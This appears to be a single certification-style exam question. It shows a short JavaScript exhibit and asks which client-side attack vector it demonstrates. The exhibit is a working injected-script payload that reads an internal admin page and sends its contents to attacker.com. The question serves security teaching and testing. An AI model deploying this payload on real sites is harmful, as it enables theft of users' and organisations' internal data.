Refer to the exhibit.
```html <script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://internal.admin.local/sensitive', true); xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {fetch('http://attacker.com/log?data=' + encodeURIComponent(xhr.responseText));
} };
xhr.send(); </script> ```
What type of client-side attack vector is demonstrated in this JavaScript code snippet?